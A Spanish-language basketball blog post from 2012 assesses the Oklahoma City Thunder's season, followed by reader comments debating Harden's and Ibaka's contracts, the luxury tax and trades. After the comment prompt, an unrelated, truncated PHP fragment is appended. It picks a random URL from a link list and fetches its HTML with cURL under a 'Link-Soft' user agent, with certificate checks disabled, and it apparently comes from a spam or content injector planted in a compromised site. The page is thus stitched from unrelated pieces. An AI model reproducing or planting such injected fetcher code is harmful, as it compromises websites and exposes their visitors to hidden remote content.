Oklahoma City Thunder: Excelente

30 de July de 2012 por TheDeerHunter

Impresionante. Los Thunder han pasado en menos de un lustro de ganar un 24% de sus partidos (en la 2007-08) a ganar un 71%, colándose en su primera finalísima desde la mudanza a Oklahoma City y pasándose de paso por la piedra con total facilidad a la plana mayor del salvaje Oeste de la última década. Luego nos venden la moto justificando todo tipo de interminables reconstrucciones.

El éxito (parcial todavía) de los Thunder tiene nombres propios. James Harden se ha llevado el premio al mejor 6º hombre y varios compañeros han protagonizado otras quinielas. El modelo potencia como nunca la individualidad máxima.  Es el peor equipo pasador de la liga y sin embargo funciona. Los artistas como Kevin Durant y Russell Westbrook se rodean de todo tipo de especialistas gladiadores: Kendrick Perkins, Nick Collison, Thabo Shefolosha, Derek Fisher, Serge Ibaka… Harden, con un perfil más colectivo, es la expceción. El baloncesto más simple y directo posible. Rebound & Gun.

La clave de este curso ha sido, además de la confirmación de Durant como uno de los grandes de la liga, la eclosión de Westbrook después del mal sabor de boca que dejó en las eliminatorias del año pasado. Juntos, pero no revueltos… eso sí. Westbrook jamás será un director y Scott  Brooks ha hecho bien en asumirlo.

Además, hay que destacar la evolución de Harden, que además del premio al mejor 6º hombre fue tenido en cuenta para el de mayor progresión, y también la de Serge Ibaka que aparte de su evidente poder intimidatorio, cada día aporta más cosas al equipo. Por desgracia para ellos es bastante probable que los Thunder no puedan contar con los dos en el futuro. No obstante aún queda tiempo para pensar en sus respectivas renovaciones.

Pero no todo ha sido bucólico y maravilloso para ellos. Si lo hubiera sido calzarían un anillo. El “pero” de la campaña también tiene nombres propios. El “Elegido” y sus Heat han supuesto el límite. El sistema de artistas-especialistas ha funcionado contra los modelos clásicos de las mejores potencias del Oeste pero no contra el atípico small-ball de los Heat. Durant ha tenido que rendirse esta vez ante un LeBron que le hizo sufrir como pocos.

No obstante los Thunder tienen margen de mejora. No hay que olvidar que es un equipo muy joven. Sólo por la experiencia adquirida deberían ser más fuertes el año próximo. Son presente y futuro de la liga y han demostrado estar perfectamente capacitados para asaltar el título. Tan sólo pequeños matices les separa de la gloria.

Lo mejor: La calidad de Durant. La mordiente de Westbrook. La evolución de Harden e Ibaka. La elección de Perry Jones.

Lo peor: Que la mejor versión de LeBron y los suyos han sido aún mejores. Los modelos defensivos frente a un modelo atípico como el de Heat. El apagón final de Harden. Fisher no ha ganado otro anillo.

Jugando a GM:

De entrada yo tocaría muy poco con respecto a lo del año pasado. Con el fichaje de Thabeet y la elección de Perry Jones el equipo estaría prácticamente cerrado. Si acaso de cara al segundo tramo de regular buscaría algún veterano para reforzar la anotación del banquillo y regular el minutaje de Durant y Westbrook.

Comenta

9 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Nada que añadir la verdad. Temporada tremenda, derroche de físico y talento y una progresión en 3 años de una franquicia a velocidad supersónica (sí, va con segundas). Y todo ello sin hacer grandes movimientos ni revolucionar el mercado; draft, draft y más draft.
    El problema es afrontar las renovaciones de Harden e Ibaka. Pienso que el barbas merece un rol de mayor calibre así que tendría sentido que cambiase de aires. Ibaka pedirá el oro y el moro pero, si son listos, no se lo darán.
    Creo que es necesario deshacerse del contrato de Perkins con un buen traspaso y una de esas 2 piezas podría ser un jugoso reclamo. Dwight por Perkins Harden y alguno más? Mmmm. Lo sé, es absurdo.

    Yo es lo único que tocaría, a Perkins

      Citar

  2. Esteban dice:
    #2

    no entiendo por que tanta chachara con los contratos de harden e ibaka, ambos tienen uqe ser renovados y pagar algo de impuesto de lujo de ser necesario

    westkrook, haden, durant e ibaka, es el nucleo mas fuerte de la nba, rodeados por jugadores baratos, no estarian tan mal en salarios, se le aplica la amnistia a perkis y con collison y shefo ya tienen 6 jugadores para ser campeones, mas jones y alguno que fiche por el minimo tipo fisher, son contendientes, nunca los dejaria ir yo

      Citar

  3. HisRoyalAirness dice:
    #3

    Vamos a ver, hablas de pagar impuesto de lujo y aplicar la amnistía en uno de las ciudades con un mercado más pequeño. La amnistía implica que el salario no cuenta, pero lo pagas. Y aún encima, conviertes en FA a alguien que puede irse al enemigo, que le va a pagar una miseria mientras tú financias a su jugador.
    El núcleo es Duran y Westbrook, incluso Durant si me apuras, no se puede tener un nùcleo de 4 tìos sobrepagados, y menos si eres Oklahoma. El luxury tax en 2 años va a ser una locura y no todo el mundo quiere, ni puede, rascarse el bolsillo.
    Por cuànto renovarías a Ibaka? Y a Harden para salir desde el banco? Ten en cuenta que KD y Wetbrook ya cobran el màximo, y Perkins un buen pellizco. No son tan fàciles las cosas

      Citar

  4. Esteban dice:
    #4

    Royal, el contrato de westbrook no es de 20 millones, es mas bajo, digo de renovar a harden digamos por 12 mill, lo mimso ibaka, mantener a collison a razon de 3 mill, sefho por mas o menos esa suma y fichar por el minimo al resto del pantel, perry jones va a cobrar muy poco por su ubicacion en el draft

    El ompuesto de lujo sera muy punitivo es cierto, pero muchos lo pagaran y si quieren seguir sdiendo una potencia deberan al menos rozarlo minimo, ya que los contratos no bajan

    Sobre la amnistia, si bien hay q pagarle los 7 mill a perkins, se ahorran ese monto en el tope q puede servir a la hora de llegar o no al impuesto de lujo

    La otra opcion es q vuelvan a seatle y ahí pueden gastar algo mas

      Citar

  5. melo15 dice:
    #5

    Gran analisis Deer, creo que Harden no es un tipo que busque mas protagonismo o creo que es lo suficientemente inteligente para saber que si se queda en OCK ganara titulos, ahora habra que pagarle bien. Ibaka es bueno pero no tanto para pagarle 12M, si Perry Jones funciona yo no lo renovaria y me quedaria con Perkins o con otro 5 que aportara defensa y intensidad.

      Citar

  6. Esteban dice:
    #6

    melo15:
    Gran analisis Deer, creo que Harden no es un tipo que busque mas protagonismo o creo que es lo suficientemente inteligente para saber que si se queda en OCK ganara titulos, ahora habra que pagarle bien. Ibaka es bueno pero no tanto para pagarle 12M, si Perry Jones funciona yo no lo renovaria y me quedaria con Perkins o con otro 5 que aportara defensa y intensidad.

    melo yo si me quedaria con ibaka y lo haria jugar de centro, tiene uno de los fisicos mas imponentes de la nba, pero carece de poder de gol jugando de 4, jugando de centro, que para mi puede, se ahorrarin los kilos de otro pivote, y un tema menos
    el propio collison o hasta perry jones podrian jugar de 4 con ibaka de 5

      Citar

  7. Q dice:
    #7

    Aquí uno que traspasaría a Westbrook y de paso al PAQUETE de Perkins en el pack para hacer hueco a Harden que es muchísimo mejor jugador y a Ibaka en una NBA donde cada vez escasean más los interiores buenos.
    No se, una opción que se me ocurre a bote pronto es ambos por Hibbert o por Al Jeferson.

    También creo que en vez de Thabeet deberían de haber ofrecido un contrato a Oden, poco que perder y mucho que ganar. Allí nadie le recordaría a Oden que fue pickeado antes que Durant, la presión ya sólo dependería de que estuviese sano por fin.

    Y por último para que me insultéis bien a gusto, también creo que es uno de los sitios perfectos para que el amnistiado Batche vaya a parar. Haría muy buenas migas en el pick and roll con Harden y les daría anotación interior que carecen bastante de ella (entre otras cosas por la nula dirección de juego de Westbrook).

      Citar

  8. Jose Luis dice:
    #8

    Harden no se quedara cobrando “menos”, es joven aun para eso y ya ha dicho que si OKC no puede renovarle por el. Maximo escuchara a los Suns en la agencia libre, creo que estudió en Phoenix.

      Citar

  9. Jose Luis dice:
    #9

    Joer maldito movil. Quitadle el punto que hay entre “el” y “maximo” a la frase anterior, y podreis entenderlo mejor. Mis disculpas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>